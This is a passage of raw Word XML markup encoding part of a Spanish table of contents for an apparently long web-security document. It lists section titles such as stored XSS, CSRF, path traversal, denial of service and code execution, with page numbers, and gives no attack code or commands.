                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034179 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>239</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="4D6352D6" w14:textId="1CAF7CE2" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034180" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>C)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Xtored XSS</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034180 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>240</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="766DC58A" w14:textId="1DD8672C" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034181" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>D)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Elevación de privilegios -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034181 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>246</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="6C402B41" w14:textId="292453D9" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034182" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>E)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Manipulación de cookies -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034182 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>246</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="74C83AA5" w14:textId="35B20782" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034183" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:t>F)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Falsificación de solicitudes entre sitios (XSRF/CSFR)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034183 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>249</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="407ECAA5" w14:textId="52C1DE92" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034184" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:t>G)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Inclusión de secuencias de comandos entre sitios (XSSI)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034184 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>252</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="5B30FBC6" w14:textId="208E2A6E" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034185" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>H)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Path Transversal</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034185 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>252</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="0137C0FC" w14:textId="600FDF2F" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034186" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>I)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Negación de servicio -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034186 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>257</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="52F34628" w14:textId="542AC759" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034187" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:t>J)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:t>Code execution</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034187 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>261</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="59D758BA" w14:textId="27475223" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034188" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>K)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Otras recomendaciones -&gt;</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034188 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>262</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="3573C7F7" w14:textId="29F385C2" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC1"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034189" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>8.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>I+D+I</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034189 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>263</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="35CB13E4" w14:textId="65692763" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034190" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>a)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>DOS</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034190 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>263</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="4AC6DE68" w14:textId="0C29FDB4" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="880"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034191" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>-</w:t>
                </w:r>
